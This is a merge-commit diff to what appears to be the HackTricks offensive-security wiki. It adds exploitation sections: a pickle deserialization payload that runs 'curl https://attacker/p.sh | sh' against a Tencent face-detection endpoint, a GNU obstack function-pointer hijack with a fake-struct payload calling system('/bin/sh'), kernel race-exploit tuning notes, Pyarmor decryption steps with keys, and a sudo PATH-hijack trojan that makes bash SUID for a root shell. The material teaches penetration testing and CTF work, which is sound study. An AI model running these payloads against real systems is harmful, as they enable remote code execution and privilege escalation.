Merge branch 'master' into update_HTB__Previous_20260110_183001

Author: carlospolop

src/AI/AI-Models-RCE.md

@@ -189,6 +189,27 @@ model.load_state_dict(torch.load("malicious_state.pth", weights_only=False))
 # /tmp/pwned.txt is created even if you get an error
 ```
 
+### Deserialization Tencent FaceDetection-DSFD resnet (CVE-2025-13715 / ZDI-25-1183)
+
+Tencent’s FaceDetection-DSFD exposes a `resnet` endpoint that deserializes user-controlled data. ZDI confirmed that a remote attacker can coerce a victim to load a malicious page/file, have it push a crafted serialized blob to that endpoint, and trigger deserialization as `root`, leading to full compromise.
+
+The exploit flow mirrors typical pickle abuse:
+
+```python
+import pickle, os, requests
+
+class Payload:
+    def __reduce__(self):
+        return (os.system, ("curl https://attacker/p.sh | sh",))
+
+blob = pickle.dumps(Payload())
+requests.post("https://target/api/resnet", data=blob,
+              headers={"Content-Type": "application/octet-stream"})
+```
+
+Any gadget reachable during deserialization (constructors, `__setstate__`, framework callbacks, etc.) can be weaponized the same way, regardless of whether the transport was HTTP, WebSocket, or a file dropped into a watched directory.
+
+
 ## Models to Path Traversal
 
 As commented in [**this blog post**](https://blog.huntr.com/pivoting-archive-slip-bugs-into-high-value-ai/ml-bounties), most models formats used by different AI frameworks are based on archives, usually `.zip`. Therefore, it might be possible to abuse these formats to perform path traversal attacks, allowing to read arbitrary files from the system where the model is loaded.

src/SUMMARY.md

@@ -408,6 +408,7 @@
   - [iOS UIPasteboard](mobile-pentesting/ios-pentesting/ios-uipasteboard.md)
   - [iOS WebViews](mobile-pentesting/ios-pentesting/ios-webviews.md)
   - [Itunesstored Bookassetd Sandbox Escape](mobile-pentesting/ios-pentesting/itunesstored-bookassetd-sandbox-escape.md)
+  - [Zero Click Messaging Image Parser Chains](mobile-pentesting/ios-pentesting/zero-click-messaging-image-parser-chains.md)
 - [Cordova Apps](mobile-pentesting/cordova-apps.md)
 - [Xamarin Apps](mobile-pentesting/xamarin-apps.md)
 
@@ -843,6 +844,7 @@
   - [Use After Free](binary-exploitation/libc-heap/use-after-free/README.md)
     - [First Fit](binary-exploitation/libc-heap/use-after-free/first-fit.md)
   - [Double Free](binary-exploitation/libc-heap/double-free.md)
+  - [Gnu Obstack Function Pointer Hijack](binary-exploitation/libc-heap/gnu-obstack-function-pointer-hijack.md)
   - [Overwriting a freed chunk](binary-exploitation/libc-heap/overwriting-a-freed-chunk.md)
   - [Heap Overflow](binary-exploitation/libc-heap/heap-overflow.md)
   - [Unlink Attack](binary-exploitation/libc-heap/unlink-attack.md)

src/binary-exploitation/integer-overflow-and-underflow.md

@@ -379,11 +379,42 @@ clang -O0 -Wall -Wextra -std=c11 -D_FORTIFY_SOURCE=0 \
 - [https://8ksec.io/arm64-reversing-and-exploitation-part-8-exploiting-an-integer-overflow-vulnerability/](https://8ksec.io/arm64-reversing-and-exploitation-part-8-exploiting-an-integer-overflow-vulnerability/)
   - Only 1B is used to store the size of the password so it's possible to overflow it and make it think it's length of 4 while it actually is 260 to bypass the length check protection and overwrite in the stack the next local variable and bypass both protections
 
+## Go integer overflow detection with go-panikint
+
+Go wraps integers silently. [go-panikint](https://github.com/trailofbits/go-panikint) is a forked Go toolchain that injects SSA overflow checks so wrapped arithmetic immediately calls `runtime.panicoverflow()` (panic + stack trace).
+
+**Why use it**
+
+- Makes overflow/truncation reachable in fuzzing/CI because arithmetic wraps now crash.
+- Useful around user-controlled pagination, offsets, quotas, size calculations, or access-control math (e.g., `end := offset + limit` on `uint64` wrapping small).
+
+**Build & use**
+
+```bash
+git clone https://github.com/trailofbits/go-panikint
+cd go-panikint/src && ./make.bash
+export GOROOT=/path/to/go-panikint
+./bin/go test -fuzz=FuzzOverflowHarness
+```
+
+Run this forked `go` binary for tests/fuzzing to surface overflows as panics.
+
+**Noise control**
+
+- Truncation checks (casts to smaller ints) can be noisy.
+- Suppress intentional wrap-around via source-path filters or inline `// overflow_false_positive` / `// truncation_false_positive` comments.
+
+**Real-world pattern**
+
+go-panikint revealed a Cosmos SDK `uint64` pagination overflow: `end := pageRequest.Offset + pageRequest.Limit` wrapped past `MaxUint64`, returning empty results. Instrumentation turned the silent wrap into a panic that fuzzers could minimize.
+
 ## ARM64
 
 This **doesn't change in ARM64** as you can see in [**this blog post**](https://8ksec.io/arm64-reversing-and-exploitation-part-8-exploiting-an-integer-overflow-vulnerability/).
 
-{{#include ../banners/hacktricks-training.md}}
-
+## References
 
+- [Detect Go’s silent arithmetic bugs with go-panikint](https://blog.trailofbits.com/2025/12/31/detect-gos-silent-arithmetic-bugs-with-go-panikint/)
+- [go-panikint (compiler fork)](https://github.com/trailofbits/go-panikint)
 
+{{#include ../banners/hacktricks-training.md}}

src/binary-exploitation/libc-heap/README.md

@@ -535,6 +535,10 @@ Study allocator-specific primitives derived from real-world bugs:
 virtualbox-slirp-nat-packet-heap-exploitation.md
 {{#endref}}
 
+{{#ref}}
+gnu-obstack-function-pointer-hijack.md
+{{#endref}}
+
 ## References
 
 - [https://azeria-labs.com/heap-exploitation-part-1-understanding-the-glibc-heap-implementation/](https://azeria-labs.com/heap-exploitation-part-1-understanding-the-glibc-heap-implementation/)

src/binary-exploitation/libc-heap/gnu-obstack-function-pointer-hijack.md

@@ -0,0 +1,67 @@
+# GNU obstack function-pointer hijack
+
+{{#include ../../banners/hacktricks-training.md}}
+
+## Overview
+
+GNU obstacks embed allocator state together with two indirect call targets:
+
+- `chunkfun` (offset `+0x38`) with signature `void *(*chunkfun)(void *, size_t)`
+- `freefun` (offset `+0x40`) with signature `void (*freefun)(void *, void *)`
+- `extra_arg` and a `use_extra_arg` flag select whether `_obstack_newchunk` calls `chunkfun(new_size)` or `chunkfun(extra_arg, new_size)`
+
+If an attacker can corrupt an application-owned `struct obstack *` or its fields, the next growth of the obstack (when `next_free == chunk_limit`) triggers an indirect call through `chunkfun`, enabling code execution primitives.
+
+## Primitive: size_t desync → 0-byte allocation → pointer OOB write
+
+A common bug pattern is using a **32-bit register** to compute `sizeof(ptr) * count` while storing the logical length in a 64-bit `size_t`.
+
+- Example: `elements = obstack_alloc(obs, sizeof(void *) * size);` is compiled as `SHL EAX,0x3` for `size << 3`.
+- With `size = 0x20000000` and `sizeof(void *) = 8`, the multiplication wraps to `0x0` in 32-bit, so the pointer array is **0 bytes**, but the recorded `size` remains `0x20000000`.
+- Subsequent `elements[curr++] = ptr;` writes perform **8-byte OOB pointer stores** into adjacent heap objects, giving a controlled cross-object overwrite primitive.
+
+## Leaking libc via `obstack.chunkfun`
+
+1. Place two heap objects adjacent (e.g., two stacks built with separate obstacks).
+2. Use the pointer-array OOB write from object A to overwrite object B’s `elements` pointer so that a `pop`/read from B dereferences an address inside object A’s obstack.
+3. Read `chunkfun` (`malloc` by default) at offset `0x38` to disclose a libc function pointer, then compute `libc_base = leak - malloc_offset` and derive other symbols (e.g., `system`, `"/bin/sh"`).
+
+## Hijacking `chunkfun` with a fake obstack
+
+Overwrite a victim’s stored `struct obstack *` to point at attacker-controlled data that mimics the obstack header. Minimal fields needed:
+
+- `next_free == chunk_limit` to force `_obstack_newchunk` on next push
+- `chunkfun = system_addr`
+- `extra_arg = binsh_addr`, `use_extra_arg = 1` to select the two-argument call form
+
+Then trigger an allocation on the victim obstack to execute `system("/bin/sh")` through the indirect call.
+
+Example fake obstack layout (glibc 2.42 offsets):
+
+```python
+fake  = b""
+fake += p64(0x1000)          # chunk_size
+fake += p64(heap_leak)       # chunk
+fake += p64(heap_leak)       # object_base
+fake += p64(heap_leak)       # next_free == chunk_limit
+fake += p64(heap_leak)       # chunk_limit
+fake += p64(0xF)             # alignment_mask
+fake += p64(0)               # temp
+fake += p64(system_addr)     # chunkfun
+fake += p64(0)               # freefun
+fake += p64(binsh_addr)      # extra_arg
+fake += p64(1)               # use_extra_arg flag set
+```
+
+## Attack recipe
+
+1. **Trigger size wrap** to create a 0-byte pointer array with a huge logical length.
+2. **Groom adjacency** so an OOB pointer store reaches a neighbor object containing an obstack pointer.
+3. **Leak libc** by redirecting a victim pointer to the neighbor obstack’s `chunkfun` and reading the function pointer.
+4. **Forge obstack** data with controlled `chunkfun`/`extra_arg` and force `_obstack_newchunk` to land in the forged header, yielding a function-pointer call of the attacker’s choice.
+
+## References
+
+- [Flagvent 2025 FV25.08 obstack exploit (0xdf)](https://0xdf.gitlab.io/flagvent2025/hard)
+
+{{#include ../../banners/hacktricks-training.md}}

src/binary-exploitation/linux-kernel-exploitation/posix-cpu-timers-toctou-cve-2025-38352.md

@@ -80,6 +80,9 @@ Two expiry-processing modes
 - CONFIG_POSIX_CPU_TIMERS_TASK_WORK=y: expiry is deferred via task_work on the target task
 - CONFIG_POSIX_CPU_TIMERS_TASK_WORK=n: expiry handled directly in IRQ context
 
+<details>
+<summary>POSIX CPU timer run paths</summary>
+
 ```c
 void run_posix_cpu_timers(void) {
     struct task_struct *tsk = current;
@@ -100,8 +103,13 @@ static inline void __run_posix_cpu_timers(struct task_struct *tsk) {
 #endif
 ```
 
+</details>
+
 In the IRQ-context path, the firing list is processed outside sighand
 
+<details>
+<summary>IRQ-context handling path</summary>
+
 ```c
 static void handle_posix_cpu_timers(struct task_struct *tsk) {
     struct k_itimer *timer, *next; unsigned long flags, start;
@@ -126,6 +134,8 @@ static void handle_posix_cpu_timers(struct task_struct *tsk) {
 }
 ```
 
+</details>
+
 Root cause: TOCTOU between IRQ-time expiry and concurrent deletion under task exit
 Preconditions
 - CONFIG_POSIX_CPU_TIMERS_TASK_WORK is disabled (IRQ path in use)
@@ -205,6 +215,12 @@ Audit hotspots (for reviewers)
 Notes for exploitation research
 - The disclosed behavior is a reliable kernel crash primitive; turning it into privilege escalation typically needs an additional controllable overlap (object lifetime or write-what-where influence) beyond the scope of this summary. Treat any PoC as potentially destabilizing and run only in emulators/VMs.
 
+### Chronomaly exploit strategy (priv-esc without fixed text offsets)
+- **Tested target & configs:** x86_64 v5.10.157 under QEMU (4 cores, 3 GB RAM). Critical options: `CONFIG_POSIX_CPU_TIMERS_TASK_WORK=n`, `CONFIG_PREEMPT=y`, `CONFIG_SLAB_MERGE_DEFAULT=n`, `DEBUG_LIST=n`, `BUG_ON_DATA_CORRUPTION=n`, `LIST_HARDENED=n`.
+- **Race steering with CPU timers:** A racing thread (`race_func()`) burns CPU while CPU timers fire; `free_func()` polls `SIGUSR1` to confirm if the timer fired. Tune `CPU_USAGE_THRESHOLD` so signals arrive only sometimes (intermittent "Parent raced too late/too early" messages). If timers fire every attempt, lower the threshold; if they never fire before thread exit, raise it.
+- **Dual-process alignment into `send_sigqueue()`:** Parent/child processes try to hit a second race window inside `send_sigqueue()`. The parent sleeps `PARENT_SETTIME_DELAY_US` microseconds before arming timers; adjust downward when you mostly see "Parent raced too late" and upward when you mostly see "Parent raced too early". Seeing both indicates you are straddling the window; success is expected within ~1 minute once tuned.
+- **Cross-cache UAF replacement:** The exploit frees a `struct sigqueue` then grooms allocator state (`sigqueue_crosscache_preallocs()`) so both the dangling `uaf_sigqueue` and the replacement `realloc_sigqueue` land on a pipe buffer data page (cross-cache reallocation). Reliability assumes a quiet kernel with few prior `sigqueue` allocations; if per-CPU/per-node partial slab pages already exist (busy systems), the replacement will miss and the chain fails. The author intentionally left it unoptimized for noisy kernels.
+
 ### See also
 
 {{#ref}}
@@ -215,5 +231,9 @@ ksmbd-streams_xattr-oob-write-cve-2025-37947.md
 - [Race Against Time in the Kernel’s Clockwork (StreyPaws)](https://streypaws.github.io/posts/Race-Against-Time-in-the-Kernel-Clockwork/)
 - [Android security bulletin – September 2025](https://source.android.com/docs/security/bulletin/2025-09-01)
 - [Android common kernel patch commit 157f357d50b5…](https://android.googlesource.com/kernel/common/+/157f357d50b5038e5eaad0b2b438f923ac40afeb%5E%21/#F0)
+- [Chronomaly exploit PoC (CVE-2025-38352)](https://github.com/farazsth98/chronomaly)
+- [CVE-2025-38352 analysis – Part 1](https://faith2dxy.xyz/2025-12-22/cve_2025_38352_analysis/)
+- [CVE-2025-38352 analysis – Part 2](https://faith2dxy.xyz/2025-12-24/cve_2025_38352_analysis_part_2/)
+- [CVE-2025-38352 analysis – Part 3](https://faith2dxy.xyz/2026-01-03/cve_2025_38352_analysis_part_3/)
 
 {{#include ../../banners/hacktricks-training.md}}

src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md

@@ -115,7 +115,10 @@ test@test:python python_exe_unpack.py -p unpacked/malware_3.exe/archive
 
 If you weren't able to extract the python "original" code following the previous steps, then you can try to **extract** the **assembly** (but i**t isn't very descriptive**, so **try** to extract **again** the original code).In [here](https://bits.theorem.co/protecting-a-python-codebase/) I found a very simple code to **disassemble** the _.pyc_ binary (good luck understanding the code flow). If the _.pyc_ is from python2, use python2:
 
-```bash
+<details>
+<summary>Disassemble a .pyc</summary>
+
+```python
 >>> import dis
 >>> import marshal
 >>> import struct
@@ -158,6 +161,19 @@ True
              17 RETURN_VALUE
 ```
 
+</details>
+
+## PyInstaller raw marshal & Pyarmor v9 static unpack workflow
+
+- **Extract embedded marshal blobs**: `pyi-archive_viewer sample.exe` and export raw objects (e.g., a file named `vvs`). PyInstaller stores bare marshal streams that start with `0xe3` (TYPE_CODE with FLAG_REF) instead of full `.pyc` files. Prepend the correct **16-byte `.pyc` header** (magic for the embedded interpreter version + zeroed timestamp/size) so decompilers accept it. For Python 3.11.5 you can grab the magic via `imp.get_magic().hex()` and patch it with `dd`/`printf` before the marshal payload.
+- **Decompile with version-aware tools**: `pycdc -c -v 3.11.5 vvs.pyc > vvs.py` or PyLingual. If only partial code is needed, you can walk the AST (e.g., `ast.NodeVisitor`) to pull specific arguments/constants.
+- **Parse the Pyarmor v9 header** to recover crypto parameters: signature `PY<license>` at `0x00`, Python major/minor at `0x09/0x0a`, protection type `0x09` when **BCC** is enabled (`0x08` otherwise), ELF start/end offsets at `0x1c/0x38`, and the 12-byte AES-CTR nonce split across `0x24..0x27` and `0x2c..0x33`. The same pattern repeats after the embedded ELF.
+- **Account for Pyarmor-modified code objects**: `co_flags` has bit `0x20000000` set and an extra length-prefixed field. Disable CPython `deopt_code()` during parsing to avoid decryption failures.
+- **Identify encrypted code regions**: bytecode is wrapped by `LOAD_CONST __pyarmor_enter_*__` … `LOAD_CONST __pyarmor_exit_*__`. Decrypt the enclosed blob with AES-128-CTR using the runtime key (e.g., `273b1b1373cf25e054a61e2cb8a947b8`). Derive the per-region nonce by XORing the payload-specific 12-byte XOR key (from the Pyarmor runtime) with the 12 bytes in the `__pyarmor_exit_*__` marker. After decryption, you may also see `__pyarmor_assert_*__` (encrypted strings) and `__pyarmor_bcc_*__` (compiled dispatch targets).
+- **Decrypt Pyarmor “mixed” strings**: constants prefixed with `0x81` are AES-128-CTR encrypted (plaintext uses `0x01`). Use the same key and the runtime-derived string nonce (e.g., `692e767673e95c45a1e6876d`) to recover long string constants.
+- **Handle BCC mode**: Pyarmor `--enable-bcc` compiles many functions to a companion ELF and leaves Python stubs that call `__pyarmor_bcc_*__`. Map those constants to ELF symbols with tooling such as `bcc_info.py`, then decompile/analyze the ELF at the reported offsets (e.g., `__pyarmor_bcc_58580__` → `bcc_180` at offset `0x4e70`).
+
+
 ## Python to Executable
 
 To start, we’re going to show you how payloads can be compiled in py2exe and PyInstaller.
@@ -217,7 +233,7 @@ C:\Users\test\Desktop\test>pyinstaller --onefile hello.py
 ## References
 
 - [https://blog.f-secure.com/how-to-decompile-any-python-binary/](https://blog.f-secure.com/how-to-decompile-any-python-binary/)
-
+- [VVS Discord Stealer Using Pyarmor for Obfuscation and Detection Evasion](https://unit42.paloaltonetworks.com/vvs-stealer/)
 
 {{#include ../../../banners/hacktricks-training.md}}
 

src/linux-hardening/privilege-escalation/README.md

@@ -1027,8 +1027,23 @@ cat /home/$USER/docker/previous/public/examples/flag
 
 Terraform resolves the symlink and copies the real `/root/root.txt` into an attacker-readable destination. The same approach can be used to **write** into privileged paths by pre-creating destination symlinks (e.g., pointing the provider’s destination path inside `/etc/cron.d/`).
 
-### Sudo execution bypassing paths
+### Sudo env_keep+=PATH / insecure secure_path → PATH hijack
+
+If `sudo -l` shows `env_keep+=PATH` or a `secure_path` containing attacker-writable entries (e.g., `/home/<user>/bin`), any relative command inside the sudo-allowed target can be shadowed.
+
+- Requirements: a sudo rule (often `NOPASSWD`) running a script/binary that calls commands without absolute paths (`free`, `df`, `ps`, etc.) and a writable PATH entry that is searched first.
 
+```bash
+cat > ~/bin/free <<'EOF'
+#!/bin/bash
+chmod +s /bin/bash
+EOF
+chmod +x ~/bin/free
+sudo /usr/local/bin/system_status.sh   # calls free → runs our trojan
+bash -p                                # root shell via SUID bit
+```
+
+### Sudo execution bypassing paths
 **Jump** to read other files or use **symlinks**. For example in sudoers file: _hacker10 ALL= (root) /bin/less /var/log/\*_
 
 ```bash
@@ -1842,6 +1857,7 @@ vmware-tools-service-discovery-untrusted-search-path-cve-2025-41244.md
 
 - [0xdf – HTB Planning (Crontab UI privesc, zip -P creds reuse)](https://0xdf.gitlab.io/2025/09/13/htb-planning.html)
 - [0xdf – HTB Era: forged .text_sig payload for cron-executed monitor](https://0xdf.gitlab.io/2025/11/29/htb-era.html)
+- [0xdf – Holiday Hack Challenge 2025: Neighborhood Watch Bypass (sudo env_keep PATH hijack)](https://0xdf.gitlab.io/holidayhack2025/act1/neighborhood-watch)
 - [alseambusher/crontab-ui](https://github.com/alseambusher/crontab-ui)
 - [https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/)
 - [https://payatu.com/guide-linux-privilege-escalation/](https://payatu.com/guide-linux-privilege-escalation/)